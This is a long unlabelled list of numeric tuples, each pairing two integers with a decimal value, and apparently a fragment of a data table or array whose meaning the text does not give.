(269, 302928, 0.95669),
(269, 302929, 0.95669),
(269, 302930, 0.91),
(269, 302931, 1.05),
(269, 302932, 1.07331),
(269, 302933, 1.07331),
(269, 302934, 1.09669),
(269, 302935, 1.4),
(269, 302936, 0.95669),
(269, 302937, 1.07331),
(269, 302938, 1.12),
(269, 302939, 0.28),
(269, 302940, 0.91),
(269, 302941, 1.09669),
(269, 302942, 1.00331),
(269, 302943, 0.91),
(269, 302944, 1.05),
(269, 302945, 0.98),
(269, 302946, 0.91),
(269, 302947, 1.82),
(269, 302948, 0.91),
(269, 302949, 0.98),
(269, 302950, 1.07331),
(269, 302951, 0.98),
(269, 302952, 1.72662),
(269, 302953, 1.86662),
(269, 302954, 1.00331),
(269, 302955, 1.30669),
(269, 302956, 0.98),
(269, 302957, 1.05),
(269, 302958, 1.16669),
(269, 302959, 0.86331),
(269, 302960, 0.93331),
(269, 302961, 0.88669),
(269, 302962, 1.05),
(269, 302963, 0.95669),
(269, 302964, 0.98),
(269, 302965, 1.07331),
(269, 302966, 1.14331),
(269, 302967, 0.32669),
(269, 302968, 0.91),
(269, 302969, 1.00331),
(269, 303342, 5.3332),
(269, 303343, 0.98),
(269, 303344, 1.09669),
(269, 303345, 0.95669),
(269, 303346, 1.02669),
(269, 303347, 0.88669),
(269, 303348, 0.98),
(269, 303349, 0.88669),
(269, 303350, 0.98),
(269, 303351, 1.14331),
(269, 303352, 1.07331),
(269, 303353, 1.12),
(269, 303354, 0.88669),
(269, 303355, 0.95669),
(269, 303356, 0.98),
(269, 303357, 1.00331),
(269, 303358, 1.09669),
(269, 303359, 1.12),
(269, 303360, 1.12),
(269, 303361, 0.37338),
(269, 303362, 0.88669),
(269, 303363, 0.93331),
(269, 303364, 0.86331),
(269, 303365, 0.93331),
(269, 303366, 1.02669),
(269, 303367, 1.14331),
(272, 303945, 0.93331),
(272, 303946, 1.16669),
(272, 303947, 1.33),
(272, 303969, 5.3332),
(273, 303972, 2.66339),
(273, 303973, 2.89),
(274, 303982, 0.98),
(274, 303983, 0.98),
(274, 303984, 2.05338),
(274, 303985, 0.86331),
(274, 303986, 0.93331),
(274, 303987, 1.82),
(274, 303988, 1.00331),
(274, 303989, 0.98),
(274, 303990, 0.95669),
(274, 303991, 1.14331),
(274, 303992, 0.91),
(306, 303992, 1.82),
(274, 303993, 1.14331),
(274, 303994, 1.23669),
(274, 303995, 0.51331),
(274, 303996, 1.07331),
(274, 303997, 1.19),
(274, 303998, 1.26),
(274, 303999, 0.98),
(274, 304000, 1.07331),
(274, 304001, 1.02669),
(274, 304002, 1.12),
(274, 304003, 1.00331),
(274, 304004, 1.23669),
(274, 304005, 1.02669),
(274, 304006, 1.19),
(274, 304007, 0.32669),
(274, 304008, 0.98),
(274, 304009, 1.07331),
(274, 304010, 1.00331),
(274, 304011, 1.07331),
(274, 304012, 0.91),
(274, 304013, 1.14331),
(274, 304014, 0.95669),
(274, 304015, 1.05),
(274, 304016, 1.02669),
(274, 304017, 1.02669),
(274, 304018, 1.12),
(274, 304019, 1.00331),
(274, 304020, 1.09669),
(274, 304021, 1.05),
(274, 304022, 1.12),
(274, 304023, 0.93331),
(274, 304024, 1.05),
(274, 304025, 1.02669),
(274, 304026, 1.12),
(274, 304027, 0.93331),
(292, 304027, 0.93331),
(274, 304028, 1.12),
(274, 304029, 0.95669),
(274, 304030, 1.00331),
(274, 304031, 8.74688),
(274, 304032, 9.81312),
(274, 304033, 0.95669),
(274, 304034, 1.09669),
(274, 304035, 1.02669),
(274, 304036, 1.12),
(274, 304037, 0.98),
(274, 304038, 1.07331),
(274, 304039, 1.00331),
(274, 304040, 1.21331),
(274, 304041, 1.00331),
(274, 304042, 0.95669),
(274, 304043, 0.98),
(274, 304044, 1.05),
(274, 304045, 0.95669),
(274, 304046, 1.16669),
(274, 304047, 1.14331),
(274, 304048, 0.93331),
(274, 304049, 1.00331),
(274, 304050, 1.07331),
(274, 304051, 1.14331),
(274, 304052, 0.88669),
(274, 304053, 1.05),
(274, 304054, 0.95669),
(274, 304055, 1.16669),
(274, 304056, 0.91),
(274, 304057, 1.00331),
(274, 304058, 1.00331),
(274, 304059, 1.21331),
(274, 304060, 0.93331),
(274, 304061, 1.16669),
(274, 304062, 1.07331),
(274, 304063, 0.98),
(274, 304064, 1.19),
(274, 304065, 1.02669),
(274, 304066, 0.86331),
(274, 304067, 0.93331),
(274, 304068, 1.02669),
(274, 304069, 1.12),
(274, 304070, 1.09669),
(274, 304071, 1.02669),
(274, 304072, 1.23669),
(274, 304514, 0.88669),
(274, 304515, 0.93331),
(274, 304516, 5.3332),
(274, 304517, 0.46669),
(274, 304518, 1.05),
(274, 304519, 1.14331),
(274, 304520, 0.95669),
(274, 304521, 1.19),
(274, 304522, 1.07331),
(274, 304523, 1.16669),
(274, 304524, 1.02669),
(274, 304525, 5.48345),
(274, 304526, 1.19),
(274, 304527, 1.14331),
(274, 304528, 1.16669),
(274, 304529, 1.19),
(274, 304530, 1.16669),
(274, 304531, 2.24),
(274, 304532, 1.19),
(274, 304533, 1.21331),
(274, 304534, 0.91),
(274, 304535, 1.09669),
(274, 304536, 1.00331),
(274, 304537, 1.09669),
(274, 304538, 0.86331),
(274, 304539, 0.93331),
(274, 304540, 0.32669),
(274, 304541, 1.00331),
(274, 304542, 1.23669),
(274, 304543, 0.98),
(274, 304544, 1.07331),
(274, 304545, 1.00331),
(274, 304546, 0.88669),
(274, 304547, 1.00331),
(274, 304548, 0.95669),
(274, 304549, 1.05),
(274, 304550, 0.95669),
(306, 304550, 1.91338),
(275, 305004, 0.88669),
(275, 305005, 0.95669),
(275, 305006, 0.95669),
(275, 305007, 1.14331),
(275, 305008, 1.00331),
(275, 305009, 1.07331),
(275, 305010, 1.00331),
(275, 305011, 1.21331),
(275, 305012, 1.02669),
(275, 305013, 1.26),
(275, 305014, 0.98),
(275, 305015, 1.09669),
(275, 305016, 1.02669),
(275, 305017, 1.14331),
(275, 305018, 0.91),
(275, 305019, 1.05),
(275, 305020, 0.93331),
(275, 305021, 0.98),
(275, 305022, 1.28331),
(275, 305023, 0.95669),
(275, 305024, 1.05),
(275, 305025, 0.84),
(275, 305026, 0.95669),
(275, 305027, 1.02669),
(275, 305028, 0.95669),
(275, 305029, 0.93331),
(288, 305029, 1.86662),
(275, 305030, 1.02669),
(275, 305031, 8.96),
(275, 305032, 9.81312),
(275, 305033, 1.02669),
(275, 305034, 0.95669),
(275, 305035, 1.02669),
(275, 305036, 1.02669),
(275, 305037, 1.09669),
(275, 305038, 0.93331),
(275, 305039, 1.00331),
(275, 305040, 1.12),
(275, 305041, 1.09669),
(275, 305042, 0.93331),
(275, 305043, 0.93331),
(275, 305044, 0.91),
(275, 305045, 0.95669),
(275, 305046, 8.74688),
(275, 305047, 9.6),
(275, 305048, 0.95669),
(275, 305049, 1.02669),
(275, 305397, 5.3332),
(275, 305398, 0.88669),
(275, 305399, 0.98),
(275, 305400, 1.05),
(275, 305401, 0.86331),
(275, 305402, 0.95669),
(275, 305403, 0.32669),
(275, 305404, 1.07331),
(275, 305405, 1.16669),
(275, 305406, 0.86331),
(292, 305406, 1.72662),
(275, 305407, 0.93331),
(275, 305408, 0.95669),
(275, 305409, 1.05),
(275, 305410, 8.32),
(275, 305411, 9.17312),
(275, 305412, 0.93331),
(275, 305413, 1.05),
(275, 305414, 0.91),
(275, 305415, 0.98),
(275, 305416, 1.07331),
(275, 305417, 1.14331),
(275, 305418, 1.05),
(275, 305419, 1.14331),
(275, 305420, 0.88669),
(275, 305421, 0.98),
(280, 307587, 1.05),
(280, 307588, 1.23669),
(280, 307589, 1.33),
(280, 307609, 5.3332),
(287, 312769, 0.86331),
(287, 312770, 1.00331),
(287, 312771, 0.81669),
(287, 312772, 0.88669),
(287, 312773, 1.00331),
(287, 312774, 0.81669),
(287, 312775, 1.00331),
(287, 312776, 1.07331),
(287, 312777, 0.91),
(287, 312778, 0.98),
(287, 312779, 0.88669),
(287, 312780, 1.14331),
(287, 312781, 0.91),
(287, 312782, 0.98),
(287, 312783, 0.86331),
(287, 312784, 0.93331),
(287, 312785, 0.93331),
(287, 312786, 1.19),
(287, 312787, 1.05),
(287, 312788, 0.93338),
(287, 312789, 1.07331),
(287, 312790, 1.19),
(287, 312791, 1.09669),
(287, 312792, 1.16669),
(287, 312793, 2.26661),
(287, 312794, 2.60661),
(287, 312795, 2.7334),
(287, 312796, 2.9334),
(287, 312797, 0.91),
(287, 312798, 0.95669),
(287, 312799, 1.00331),
(287, 312800, 1.14331),
(287, 312801, 0.84),
(287, 312802, 0.91),
(287, 312803, 0.91),
(287, 312804, 0.98),
(287, 312805, 0.95669),
(287, 312806, 1.09669),
(287, 312807, 1.96),
(287, 312808, 0.91),
(287, 312809, 1.07331),
(287, 312810, 1.02669),
(287, 312951, 1.02669),
(287, 312952, 1.19),
(287, 312953, 0.28),
(287, 312954, 1.09669),
(287, 312955, 1.16669),
(287, 312956, 0.32669),
(287, 312957, 0.93331),
(287, 312958, 1.02669),
(287, 312959, 0.93331),
(287, 312960, 1.02669),
(287, 312961, 0.95669),
(287, 312962, 1.14331),
(287, 312963, 0.88669),
(287, 312964, 1.02669),
(287, 312965, 0.23331),
(287, 312966, 0.93331),
(287, 312967, 1.05),
(287, 312968, 0.32669),
(287, 312969, 0.95669),
(287, 312970, 1.12),
(287, 312971, 1.07331),
(287, 312972, 1.14331),
(287, 312973, 0.91),
(287, 312974, 1.02669),
(287, 312975, 0.28),
(287, 312976, 0.93331),
(287, 312977, 1.02669),
(287, 312978, 0.28),
(287, 312979, 0.91),
(287, 312980, 1.07331),
(287, 312981, 1.00331),
(287, 312982, 1.07331),
(287, 312983, 1.05),
(287, 312984, 1.12),
(288, 313248, 1.00331),
(288, 313249, 1.02669),
(288, 313250, 0.86331),
(288, 313251, 0.95669),
(288, 313252, 0.93331),
(288, 313253, 1.00331),
(288, 313254, 1.05),
(288, 313255, 0.88669),
(288, 313256, 1.09669),
(288, 313257, 0.93331),
(288, 313258, 1.07331),
(288, 313259, 0.56),
(288, 313260, 1.09669),
(288, 313261, 1.16669),
(288, 313262, 0.42),
(288, 313263, 1.00331),
(288, 313264, 1.16669),
(288, 313265, 0.84),
(288, 313266, 0.95669),
(288, 313267, 1.05),
(288, 313268, 0.91),
(288, 313269, 1.09669),
(288, 313270, 0.98),
(288, 313271, 1.09669),
(288, 313272, 1.09669),
(288, 313273, 1.07331),
(288, 313274, 1.19),
(288, 313275, 0.91),
(288, 313276, 1.05),
(288, 313277, 1.00331),
(288, 313278, 1.07331),
(288, 313279, 1.07331),
(288, 313280, 1.33),
(288, 313281, 0.98),
(288, 313282, 1.09669),
(288, 313283, 1.07331),
(288, 313284, 1.16669),
(288, 313285, 2.05338),
(288, 313286, 2.28662),
(288, 313287, 1.09669),
(288, 313288, 1.21331),
(288, 313289, 0.95669),
(288, 313290, 1.21331),
(288, 313291, 1.00331),
(288, 313292, 1.12),
(288, 313293, 0.88669),
(288, 313294, 1.12),
(288, 313295, 1.02669),
(288, 313296, 1.16669),
(288, 313297, 1.00331),
(306, 313297, 1.00331),
(288, 313298, 1.16669),
(288, 313299, 0.93331),
(288, 313300, 1.21331),
(288, 313301, 4.98644),
(288, 313302, 1.05),
(288, 313303, 1.30669),
(288, 313304, 3.21993),
(288, 313305, 2.33338),
(288, 313306, 1.16669),
(288, 313307, 4.16),
(288, 313308, 3.84),
(288, 313309, 4.24008),
(288, 313310, 1.12),
(288, 313311, 1.21331),
(288, 313312, 3.29007),
(288, 313313, 3.57),
(288, 313754, 0.32669),
(288, 313755, 0.98),
(288, 313756, 1.12),
(288, 313757, 0.95669),
(288, 313758, 0.93331),
(288, 313759, 1.02669),
(288, 313760, 0.88669),
(288, 313761, 1.19),
(288, 313762, 0.95669),
(288, 313763, 1.72662),
(288, 313764, 1.02669),
(288, 313765, 0.98),
(288, 313766, 1.05),
(288, 313767, 1.14331),
(288, 313768, 0.98),
(288, 313769, 0.37331),
(288, 313770, 1.02669),
(288, 313771, 1.12),
(288, 313772, 0.91),
(288, 313773, 1.05),
(288, 313774, 0.88669),
(288, 313775, 0.98),
(288, 313776, 0.93331),
(288, 313777, 1.02669),
(288, 313778, 0.93331),
(288, 313779, 1.00331),
(288, 313780, 0.32669),
(288, 313781, 0.95669),
(288, 313782, 1.05),
(288, 313783, 0.42),
(288, 313784, 0.98),
(288, 313785, 1.09669),
(288, 313786, 0.98),
(288, 313787, 1.28331),
(288, 313788, 0.93331),
(288, 313789, 1.14331),
(288, 313790, 1.00331),
(288, 313791, 1.09669),
(288, 313792, 1.23669),
(288, 313793, 1.33),
(290, 315294, 0.88669),
(290, 315295, 1.02669),
(290, 315296, 0.91),
(290, 315297, 1.00331),
(290, 315298, 1.00331),
(290, 315299, 0.23331),
(290, 315300, 1.07331),
(290, 315301, 1.19),
(290, 315302, 0.18669),
(290, 315303, 0.88669),
(290, 315304, 1.09669),
(290, 315305, 0.28),
(290, 315306, 1.05),
(290, 315307, 1.14331),
(290, 315308, 1.05),
(290, 315309, 1.26),
(290, 315310, 0.95669),
(290, 315311, 1.16669),
(290, 315312, 0.98),
(290, 315313, 1.07331),
(290, 315314, 1.05),
(290, 315315, 1.26),
(290, 315316, 0.32669),
(290, 315317, 0.95669),
(290, 315318, 1.09669),
(290, 315319, 0.84),
(290, 315320, 0.93331),
(290, 315321, 0.98),
(290, 315322, 1.05),
(290, 315323, 1.72662),
(290, 315324, 1.00331),
(290, 315325, 1.02669),
(290, 315326, 1.14331),
(290, 315327, 0.98),
(290, 315328, 1.07331),
(290, 315329, 0.98),
(290, 315330, 1.09669),
(290, 315331, 0.93331),
(290, 315332, 1.00331),
(290, 315333, 1.12),
(290, 315334, 0.98),
(290, 315335, 0.98),
(290, 315336, 1.16669),
(290, 315337, 1.02669),
(290, 315338, 0.91),
(292, 315338, 0.91),
(290, 315339, 0.98),
(290, 315340, 0.98),
(290, 315341, 1.14331),
(290, 315342, 1.02669),
(290, 315343, 2.00662),
(290, 315344, 1.07331),
(290, 315345, 1.07331),
(290, 315346, 0.98),
(290, 315347, 1.05),
(290, 315348, 0.95669),
(290, 315349, 0.98),
(290, 315350, 0.98),
(290, 315351, 0.95669),
(290, 315352, 1.91338),
(290, 315353, 1.05),
(290, 315354, 1.07331),
(290, 315355, 0.84),
(290, 315356, 0.93331),
(290, 315357, 1.07331),
(290, 315358, 0.93331),
(290, 315359, 1.00331),
(290, 315360, 0.95669),
(290, 315361, 1.05),
(290, 315362, 1.07331),
(290, 315363, 1.16669),
(290, 315364, 0.98),
(290, 315365, 1.05),
(290, 315366, 1.00331),
(290, 315367, 0.81669),
(290, 315368, 0.93331),
(290, 315369, 1.02669),
(290, 315370, 0.84),
(290, 315371, 0.93331),
(290, 315372, 1.02669),
(290, 315373, 1.91338),
(290, 315374, 0.95669),
(290, 315375, 1.14331),
(290, 315376, 1.00331),
(290, 315377, 1.14331),
(290, 315657, 0.98),
(290, 315658, 0.95669),
(290, 315659, 1.02669),
(290, 315660, 1.02669),
(290, 315661, 1.14331),
(290, 315662, 0.95669),
(290, 315663, 1.02669),
(290, 315664, 0.91),
(290, 315665, 1.02669),
(290, 315666, 1.05),
(290, 315667, 1.16669),
(290, 315668, 0.42),
(290, 315669, 1.02669),
(290, 315670, 1.21331),
(290, 315671, 0.98),
(290, 315672, 10.6669),
(290, 315673, 1.02669),
(290, 315674, 5.46),
(290, 315675, 2.14662),
(290, 315676, 1.00331),
(290, 315677, 1.05),
(290, 315678, 2.05338),
(290, 315679, 0.91),
(306, 315679, 0.91),
(290, 315680, 1.02669),
(290, 315681, 0.28),
(290, 315682, 1.00331),
(290, 315683, 1.12),
(290, 315684, 0.95669),
(290, 315685, 1.14331),
(290, 315686, 0.98),
(290, 315687, 1.07331),
(290, 315688, 0.98),
(290, 315689, 1.09669),
(290, 315690, 0.95669),
(290, 315691, 1.02669),
(290, 315692, 1.96),
(290, 315693, 1.07331),
(290, 315694, 1.07331),
(290, 315695, 0.95669),
(306, 315695, 0.95669),
(290, 315696, 1.05),
(290, 315697, 0.95669),
(290, 315698, 1.05),
(290, 315699, 0.23331),
(290, 315700, 0.93331),
(290, 315701, 1.02669),
(290, 315702, 1.02669),
(290, 315703, 0.81669),
(290, 315704, 0.88669),
(290, 315705, 0.86331),
(290, 315706, 1.00331),
(290, 315707, 0.93331),
(290, 315708, 1.05),
(290, 315709, 0.28),
(290, 315710, 0.93331),
(290, 315711, 1.07331),
(290, 315712, 0.84),
(290, 315713, 0.98),
(290, 315714, 1.12),
(290, 315715, 0.98),
(290, 315716, 1.07331),
(290, 315717, 0.98),
(290, 315718, 1.19),
(290, 315719, 1.19),
(290, 315720, 0.98),
(290, 315721, 1.05),
(290, 315722, 0.95669),
(290, 315723, 1.14331),
(290, 315724, 1.09669),
(290, 315725, 1.14331),
(290, 315726, 1.23669),
(290, 315727, 0.28),
(290, 315728, 0.91),
(290, 315729, 1.00331),
(290, 315730, 0.98),
(290, 315731, 1.09669),
(290, 315732, 0.93331),
(290, 315733, 1.12),
(292, 317350, 0.95669),
(292, 317351, 1.02669),
(292, 317352, 0.88669),
(292, 317353, 0.95669),
(292, 317354, 0.84),
(292, 317355, 0.93331),
(292, 317356, 0.91),
(304, 317356, 0.91),
(292, 317357, 0.95669),
(292, 317358, 0.93331),
(292, 317359, 0.91),
(292, 317360, 0.86331),
(292, 317361, 0.93331),
(292, 317362, 0.95669),
(292, 317363, 1.02669),
(292, 317364, 0.88669),
(292, 317365, 0.98),
(292, 317366, 2.52),
(292, 317367, 2.79993),
(292, 317368, 0.84),
(292, 317369, 0.91),
(292, 317370, 1.07331),
(292, 317371, 0.91),
(292, 317372, 1.02669),
(292, 317373, 0.84),
(292, 317374, 0.98),
(292, 317375, 0.93331),
(292, 317376, 1.02669),
(292, 317377, 0.98),
(292, 317378, 1.09669),
(292, 317379, 1.05),
(292, 317380, 0.42),
(292, 317381, 1.02669),
(292, 317382, 1.21331),
(292, 317383, 1.12),
(292, 317384, 0.88669),
(292, 317385, 1.00331),
(292, 317386, 1.00331),
(292, 317387, 1.02669),
(292, 317388, 0.98),
(292, 317389, 0.98),
(292, 317390, 0.88669),
(292, 317391, 1.07331),
(292, 317392, 1.02669),
(292, 317393, 1.00331),
(292, 317394, 1.12),
(292, 317395, 0.32669),
(292, 317396, 1.00331),
(292, 317397, 1.07331),
(292, 317398, 0.81669),
(292, 317399, 0.98),
(292, 317400, 1.00331),
(292, 317401, 1.26),
(292, 317402, 0.84),
(292, 317403, 1.00331),
(292, 317404, 0.98),
(292, 317405, 1.07331),
(292, 317406, 1.02669),
(292, 317407, 0.98),
(292, 317408, 9.81312),
(292, 317409, 1.02669),
(292, 317410, 0.95669),
(292, 317411, 1.86662),
(292, 317412, 1.02669),
(292, 317413, 1.07331),
(292, 317414, 1.05),
(292, 317415, 1.12),
(292, 317416, 0.86331),
(292, 317417, 0.98),
(292, 317885, 5.3332),
(292, 317886, 0.91),
(292, 317887, 0.88669),
(292, 317888, 0.98),
(292, 317889, 0.88669),
(292, 317890, 0.95669),
(292, 317891, 0.91),
(292, 317892, 0.95669),
(292, 317893, 0.98),
(292, 317894, 1.05),
(292, 317895, 0.86331),
(292, 317896, 0.95669),
(292, 317897, 0.91),
(292, 317898, 0.88669),
(292, 317899, 1.02669),
(292, 317900, 4.90636),
(292, 317901, 0.98),
(292, 317902, 1.12),
(292, 317903, 8.16981),
(292, 317904, 8.93019),
(292, 317905, 0.93331),
(292, 317906, 1.02669),
(292, 317907, 1.96),
(292, 317908, 1.07331),
(292, 317909, 1.14331),
(292, 317910, 1.02669),
(292, 317911, 1.12),
(292, 317912, 0.28),
(292, 317913, 0.93331),
(292, 317914, 1.09669),
(292, 317915, 0.98),
(292, 317916, 1.07331),
(292, 317917, 2.87007),
(292, 317918, 2.14662),
(292, 317919, 1.02669),
(292, 317920, 0.23331),
(292, 317921, 0.91),
(292, 317922, 0.98),
(292, 317923, 0.98),
(292, 317924, 1.12),
(292, 317925, 0.98),
(292, 317926, 2.66007),
(292, 317927, 1.05),
(292, 317928, 0.95669),
(292, 317929, 0.98),
(292, 317930, 0.91),
(292, 317931, 0.98),
(292, 317932, 0.86331),
(292, 317933, 0.95669),
(292, 317934, 1.14331),
(292, 317935, 1.26),
(292, 317936, 1.00331),
(292, 317937, 0.98),
(292, 317938, 1.07331),
(292, 317939, 0.95669),
(292, 317940, 1.07331),
(292, 317941, 1.02669),
(292, 317942, 1.19),
(292, 317943, 1.02669),
(292, 317944, 1.12),
(292, 317945, 0.95669),
(292, 317946, 1.16669),
(292, 317947, 1.00331),
(292, 317948, 1.07331),
(292, 317949, 0.93331),
(292, 317950, 1.09669),
(292, 317951, 0.32669),
(292, 317952, 0.93331),
(292, 317953, 1.00331),
(292, 317954, 0.32669),
(292, 317955, 1.07331),
(292, 317956, 1.19),
(292, 317957, 0.98),
(294, 318435, 9.38688),
(294, 318436, 10.88),
(294, 318461, 1.07331),
(294, 318462, 1.14331),
(295, 318554, 0.91),
(295, 318555, 1.12),
(295, 318556, 0.37331),
(295, 318557, 1.07331),
(295, 318558, 1.21331),
(295, 318559, 0.98),
(295, 318560, 1.14331),
(295, 318561, 0.95669),
(295, 318562, 1.02669),
(295, 318563, 0.91),
(295, 318564, 1.00331),
(295, 318565, 1.00331),
(295, 318566, 9.17312),
(295, 318567, 10.4531),
(295, 318568, 0.23331),
(295, 318569, 0.93331),
(295, 318570, 1.07331),
(295, 318571, 1.05),
(295, 318572, 0.86331),
(295, 318573, 1.07331),
(295, 318750, 0.74662),
(295, 318751, 1.14331),
(295, 318752, 1.30669),
(295, 318753, 1.00331),
(295, 318754, 1.07331),
(295, 318755, 1.02669),
(295, 318756, 1.12),
(295, 318757, 1.02669),
(295, 318758, 1.09669),
(295, 318759, 0.95669),
(295, 318760, 1.05),
(295, 318761, 1.07331),
(295, 318762, 1.33),
(295, 318763, 2.28683),
(295, 318764, 2.87007),
(295, 318765, 3.15),
(295, 318766, 2.87007),
(295, 318767, 2.24),
(295, 318768, 1.05),
(295, 318769, 1.05),
(295, 318770, 1.14331),
(295, 318771, 0.74662),
(295, 318772, 0.98),
(295, 318773, 1.09669),
(295, 318774, 1.05),
(295, 318775, 1.14331),
(295, 318776, 0.32669),
(295, 318777, 0.93331),
(295, 318778, 1.14331),
(295, 318779, 0.98),
(295, 318780, 1.19),
(295, 318781, 0.23331),
(295, 318782, 1.00331),
(295, 318783, 1.09669),
(295, 318784, 1.07331),
(295, 318785, 1.26),
(295, 318786, 1.00331),
(295, 318787, 1.07331),
(295, 318788, 0.98),
(295, 318789, 1.12),
(295, 318790, 0.95669),
(295, 318791, 1.07331),
(295, 318792, 0.95669),
(295, 318793, 1.07331),
(295, 318794, 0.42),
(295, 318795, 1.05),
(295, 318796, 1.14331),
(295, 318797, 1.09669),
(295, 318798, 1.23669),
(298, 320002, 0.91),
(308, 320002, 0.91),
(298, 320003, 0.98),
(308, 320003, 0.98),
(298, 320004, 1.02669),
(308, 320004, 1.02669),
(298, 320005, 1.05),
(308, 320005, 1.05),
(298, 320006, 1.14331),
(308, 320006, 1.14331),
(298, 320007, 1.21331),
(308, 320007, 1.21331),
(298, 320008, 0.95669),
(308, 320008, 0.95669),
(298, 320009, 1.12),
(308, 320009, 1.12),
(298, 320010, 1.19),
(308, 320010, 1.19),
(298, 320011, 0.95669),
(308, 320011, 0.95669),
(298, 320012, 1.02669),
(308, 320012, 1.02669),
(298, 320013, 0.91),
(304, 320013, 0.91),
(305, 320013, 0.91),
(308, 320013, 0.91),
(298, 320014, 1.05),
(304, 320014, 1.05),
(308, 320014, 1.05),
(298, 320015, 1.00331),
(308, 320015, 1.00331),
(298, 320016, 1.07331),
(308, 320016, 1.07331),
(298, 320017, 0.93331),
(308, 320017, 0.93331),
(298, 320018, 1.07331),
(308, 320018, 1.07331),
(298, 320019, 0.98),
(304, 320019, 0.98),
(298, 320020, 1.05),
(304, 320020, 1.05),
(298, 320021, 0.91),
(308, 320021, 0.91),
(298, 320022, 1.09669),
(308, 320022, 1.09669),
(298, 320023, 0.98),
(298, 320024, 1.07331),
(298, 320025, 1.05),
(308, 320025, 1.05),
(298, 320026, 1.00331),
(308, 320026, 1.00331),
(298, 320027, 1.23669),
(308, 320027, 1.23669),
(298, 320028, 0.95669),
(308, 320028, 0.95669),
(298, 320029, 1.12),
(308, 320029, 1.12),
(298, 320030, 0.98),
(308, 320030, 0.98),
(298, 320031, 1.19),
(308, 320031, 1.19),
(298, 320032, 1.28331),
(308, 320032, 1.28331),
(298, 320033, 0.98),
(308, 320033, 0.98),
(298, 320034, 1.09669),
(308, 320034, 1.09669),
(298, 320035, 1.07331),
(308, 320035, 1.07331),
(298, 320036, 0.37331),
(308, 320036, 0.37331),
(298, 320037, 0.98),
(308, 320037, 0.98),
(298, 320038, 1.07331),
(308, 320038, 1.07331),
(298, 320039, 1.05),
(308, 320039, 1.05),
(298, 320040, 1.05),
(308, 320040, 1.05),
(298, 320041, 1.02669),
(308, 320041, 1.02669),
(298, 320042, 1.21331),
(308, 320042, 1.21331),
(298, 320043, 1.02669),
(308, 320043, 1.02669),
(298, 320044, 1.26),
(308, 320044, 1.26),
(298, 320045, 1.09669),
(308, 320045, 1.09669),
(298, 320046, 1.00331),
(308, 320046, 1.00331),
(298, 320047, 1.09669),
(308, 320047, 1.09669),
(298, 320048, 0.51331),
(298, 320049, 1.12),
(298, 320050, 1.19),
(298, 320051, 0.98),
(308, 320051, 0.98),
(298, 320052, 1.19),
(308, 320052, 1.19),
(298, 320053, 0.95669),
(308, 320053, 0.95669),
(298, 320054, 1.05),
(308, 320054, 1.05),
(298, 320055, 0.42),
(304, 320055, 0.42),
(308, 320055, 0.42),
(298, 320056, 1.05),
(304, 320056, 1.05),
(298, 320057, 1.14331),
(304, 320057, 1.14331),
(298, 320058, 1.19),
(298, 320316, 1.09669),
(308, 320316, 1.09669),
(298, 320317, 1.23669),
(308, 320317, 1.23669),
(298, 320318, 1.09669),
(308, 320318, 1.09669),
(298, 320319, 1.21331),
(308, 320319, 1.21331),
(298, 320320, 1.07331),
(308, 320320, 1.07331),
(298, 320321, 1.19),
(308, 320321, 1.19),
(298, 320322, 0.95669),
(308, 320322, 0.95669),
(298, 320323, 1.07331),
(308, 320323, 1.07331),
(298, 320324, 0.95669),
(308, 320324, 0.95669),
(298, 320325, 1.12),
(308, 320325, 1.12),
(298, 320326, 0.56),
(308, 320326, 0.56),
(298, 320327, 1.00331),
(308, 320327, 1.00331),
(298, 320328, 1.19),
(308, 320328, 1.19),
(298, 320329, 0.93331),
(308, 320329, 0.93331),
(298, 320330, 1.14331),
(308, 320330, 1.14331),
(298, 320331, 0.32669),
(304, 320331, 0.32669),
(305, 320331, 0.32669),
(308, 320331, 0.32669),
(298, 320332, 0.98),
(308, 320332, 0.98),
(298, 320333, 1.16669),
(308, 320333, 1.16669),
(298, 320334, 0.23331),
(308, 320334, 0.23331),
(298, 320335, 0.88669),
(308, 320335, 0.88669),
(298, 320336, 1.12),
(308, 320336, 1.12),
(298, 320337, 1.14331),
(308, 320337, 1.14331),
(298, 320338, 1.23669),
(308, 320338, 1.23669),
(298, 320339, 1.12),
(308, 320339, 1.12),
(298, 320340, 0.91),
(308, 320340, 0.91),
(298, 320341, 1.07331),
(308, 320341, 1.07331),
(298, 320342, 1.21331),
(308, 320342, 1.21331),
(298, 320343, 0.95669),
(308, 320343, 0.95669),
(298, 320344, 1.14331),
(308, 320344, 1.14331),
(298, 320345, 1.02669),
(308, 320345, 1.02669),
(298, 320346, 0.98),
(308, 320346, 0.98),
(298, 320347, 1.09669),
(308, 320347, 1.09669),
(298, 320348, 1.16669),
(308, 320348, 1.16669),
(298, 320349, 1.37669),
(308, 320349, 1.37669),
(298, 320350, 1.16669),
(308, 320350, 1.16669),
(298, 320351, 1.30669),
(308, 320351, 1.30669),
(298, 320352, 3.57),
(308, 320352, 3.57),
(298, 320353, 1.33),
(308, 320353, 1.33),
(298, 320354, 1.33),
(308, 320354, 1.33),
(298, 320355, 1.30669),
(308, 320355, 1.30669),
(298, 320356, 1.12),
(308, 320356, 1.12),
(298, 320357, 1.19),
(308, 320357, 1.19),
(298, 320358, 1.00331),
(308, 320358, 1.00331),
(298, 320359, 1.09669),
(308, 320359, 1.09669),
(298, 320360, 0.32669),
(308, 320360, 0.32669),
(298, 320361, 1.02669),
(308, 320361, 1.02669),
(298, 320362, 1.21331),
(308, 320362, 1.21331),
(298, 320363, 0.98),
(308, 320363, 0.98),
(298, 320364, 1.14331),
(308, 320364, 1.14331),
(298, 320365, 1.09669),
(308, 320365, 1.09669),
(298, 320366, 1.35331),
(308, 320366, 1.35331),
(298, 320367, 0.28),
(308, 320367, 0.28),
(298, 320368, 0.98),
(308, 320368, 0.98),
(298, 320369, 1.07331),
(308, 320369, 1.07331),
(298, 320370, 0.46669),
(308, 320370, 0.46669),
(298, 320371, 1.12),
(308, 320371, 1.12),
(298, 320372, 1.23669),
(308, 320372, 1.23669),
(299, 320560, 0.84),
(304, 320560, 0.84),
(299, 320561, 0.98),
(304, 320561, 0.98),
(299, 320562, 0.91),
(299, 320563, 1.02669),
(299, 320564, 0.93331),
(299, 320565, 1.14331),
(299, 320566, 1.09669),
(299, 320567, 1.07331),
(299, 320568, 0.93331),
(299, 320569, 2.24),
(299, 320570, 0.88669),
(299, 320571, 0.98),
(299, 320572, 0.98),
(299, 320573, 1.00331),
(299, 320574, 1.14331),
(299, 320575, 1.91338),
(299, 320576, 1.09669),
(299, 320577, 1.05),
(299, 320578, 1.00331),
(299, 320579, 1.12),
(299, 320580, 0.98),
(299, 320581, 1.05),
(299, 320582, 0.46669),
(299, 320583, 1.00331),
(299, 320584, 1.14331),
